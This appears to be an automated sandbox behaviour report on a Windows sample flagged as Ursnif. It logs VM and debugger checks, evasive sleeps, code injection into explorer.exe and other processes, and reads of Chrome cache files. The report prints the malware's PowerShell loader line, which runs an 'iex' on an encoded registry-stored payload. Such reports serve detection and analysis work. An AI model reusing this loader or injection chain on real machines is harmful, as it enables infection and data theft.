Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5042
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2643

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_04FA32BA
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEA85C FindFirstFileW,DeleteFileW,FindNextFileW,	30_2_04DEA85C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0C34 FindFirstFileW,	30_2_04DF0C34
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	30_2_04E00180

Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy

Source: explorer.exe, 0000001E.00000000.499031420.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001E.00000000.491040385.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001E.00000000.499031420.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: WerFault.exe, 00000025.00000002.529289252.0000000004EB0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@X
Source: RuntimeBroker.exe, 00000021.00000000.487413286.0000021DB5A53000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.491040385.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: WerFault.exe, 00000025.00000002.529150553.0000000004DF7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000001E.00000000.498755942.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 0000001E.00000000.498755942.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 0000001E.00000002.691931764.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 1ED55030000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 88E31580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 88E31580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 5D6000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 2E60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 5548	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3440
Source: C:\Windows\explorer.exe	Thread register set: target process: 3092
Source: C:\Windows\explorer.exe	Thread register set: target process: 4252
Source: C:\Windows\explorer.exe	Thread register set: target process: 4572
Source: C:\Windows\explorer.exe	Thread register set: target process: 5724
Source: C:\Windows\explorer.exe	Thread register set: target process: 5720
Source: C:\Windows\explorer.exe	Thread register set: target process: 6208
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe	Thread register set: target process: 4724

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6E38C12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6E38C12E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 5D6000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2E60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF8000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A63E000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF73E955FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 1ED55030000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF73E955FD0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Source: explorer.exe, 0000001E.00000000.499031420.00000000083EB000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA93D5 cpuid

1_2_04FA93D5

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA1A4E GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_04FA1A4E

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA93D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_04FA93D5

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA6A7F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_04FA6A7F

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003

